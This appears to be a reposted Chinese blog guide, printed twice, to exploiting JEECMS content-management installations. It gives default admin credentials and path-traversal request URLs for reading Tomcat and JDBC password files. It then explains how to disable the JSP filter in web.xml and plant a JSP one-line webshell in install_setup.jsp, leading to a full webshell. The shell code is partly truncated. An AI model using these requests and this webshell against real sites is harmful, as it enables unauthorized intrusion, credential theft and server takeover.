JEECMS后台任意文件编辑漏洞及拿shell
2012-07-11 09:27
2715 查看
JEECMS是基于java技术开发,继承其强大、稳定、安全、高效、跨平台等多方面的优点 · 采用SpringMVC3+Spring3+Hibernate3+Freemarker主流技术架构 安全性做得非常变态,当网站安装完成后就不再允许执行任何目录下的jsp文件了(web.xml配置了过滤器禁止了很多种动态脚本)。
2.x后台:
login/Jeecms.do
3.x后台:
jeeadmin/jeecms/index.do
默认账户:admin
默认密码:password
获取tomcat密码:
/jeeadmin/jeecms/template/v_edit.do?root=../../conf/&name=../../conf/tomcat-users.xml
获取JDBC数据库账号密码:
/jeeadmin/jeecms/template/v_edit.do?root=%2FWEB-INF%2Fconfig%2F&name=%2FWEB-INF%2Fconfig%2Fjdbc.properties
JEECMS2.x版读取路径:
admin/core/template/Com_edit.do?relPath=\../../../classes/jdbc.properties
修改web.xml取消对jsp的过滤:
/jeeadmin/jeecms/template/v_edit.do?root=%2FWEB-INF%2F&name=%2FWEB-INF%2Fweb.xml
JEECMS2.x版读取路径:
admin/core/template/Com_edit.do?relPath=\../../../web.xml
修改install/install_setup.jsp:
/jeeadmin/jeecms/template/v_edit.do?root=%2Finstall%2F&name=%2Finstall%2Finstall_setup.jsp
JEECMS2.x版读取路径:
admin/core/template/Com_edit.do?relPath=\../../../../install\install_setup.jsp
插入Jsp一句话:
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("
("f"))).write(request.getParameter("t").getBytes());
%>
修改后的一句话目录
/install/install_setup.jsp
一句话连接成功后的jsp大马目录:
/ma.jsp
注:
1:2.X 在后台可以上传媒体格式为jsp的文件
2:web.xml修改后需要重启服务器(自动加载更新的除外)
3:本文由网络大学(doie.net)原创,转载请留名。
2.x后台:
login/Jeecms.do
3.x后台:
jeeadmin/jeecms/index.do
默认账户:admin
默认密码:password
获取tomcat密码:
/jeeadmin/jeecms/template/v_edit.do?root=../../conf/&name=../../conf/tomcat-users.xml
获取JDBC数据库账号密码:
/jeeadmin/jeecms/template/v_edit.do?root=%2FWEB-INF%2Fconfig%2F&name=%2FWEB-INF%2Fconfig%2Fjdbc.properties
JEECMS2.x版读取路径:
admin/core/template/Com_edit.do?relPath=\../../../classes/jdbc.properties
修改web.xml取消对jsp的过滤:
/jeeadmin/jeecms/template/v_edit.do?root=%2FWEB-INF%2F&name=%2FWEB-INF%2Fweb.xml
JEECMS2.x版读取路径:
admin/core/template/Com_edit.do?relPath=\../../../web.xml
修改install/install_setup.jsp:
/jeeadmin/jeecms/template/v_edit.do?root=%2Finstall%2F&name=%2Finstall%2Finstall_setup.jsp
JEECMS2.x版读取路径:
admin/core/template/Com_edit.do?relPath=\../../../../install\install_setup.jsp
插入Jsp一句话:
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("
("f"))).write(request.getParameter("t").getBytes());
%>
修改后的一句话目录
/install/install_setup.jsp
一句话连接成功后的jsp大马目录:
/ma.jsp
注:
1:2.X 在后台可以上传媒体格式为jsp的文件
2:web.xml修改后需要重启服务器(自动加载更新的除外)
3:本文由网络大学(doie.net)原创,转载请留名。
相关文章推荐
- [代码审计]XiaoCms(后台任意文件上传至getshell,任意目录删除,会话固定漏洞)
- PHPcmsV9任意文件读取漏洞拿Shell
- 网狐6603棋牌网站程序后台部分任意文件上传漏洞
- PHPcmsV9任意文件读取漏洞拿Shell
- ThinkSNS2.5前台getshell+后台任意文件删除
- PHPcms9.6.0 最新版任意文件上传漏洞(直接getshell)
- phpcms本地包含漏洞导致的写shell漏洞和删除任意文件漏洞
- WordPress OptimizePress插件任意文件上传漏洞
- Fckeditor 2.4.2 php任意上传文件漏洞
- vim 编辑 运行 shell 文件
- 中国电信某站点JBOSS任意文件上传漏洞
- WordPress Think Responsive Themes ‘upload_settings_image.php’任意文件上传漏洞
- 【漏洞分析】WordPress任意文件上传漏洞
- SiteServer XSS 后台绕过登陆 遍历文件漏洞
- WordPress Sitemile Auctions插件任意文件上传漏洞
- 【转】ASP.NET惊爆新安全漏洞 攻击者可访问任意文件
- (原创)浅谈任意文件下载漏洞的利用
- 任意文件下载漏洞 asp站点
- web安全(7)-- 任意文件下载漏洞
- [CVE-2014-8959] phpmyadmin任意文件包含漏洞分析